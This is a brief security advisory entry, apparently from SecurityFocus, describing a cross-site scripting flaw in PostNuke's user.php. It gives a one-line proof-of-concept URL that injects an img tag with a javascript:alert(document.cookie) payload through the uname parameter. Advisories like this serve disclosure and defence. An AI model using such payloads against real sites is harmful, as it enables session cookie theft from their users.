PostNuke User.PHP UNAME Cross-Site Scripting Vulnerability

The following proof of concept has been provided:

http://www.server.com/user.php?op=confirmnewuser&module=NS-NewUser&uname=%22
%3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=lucas@pelu
cas.com


 

Privacy Statement
Copyright 2010, SecurityFocus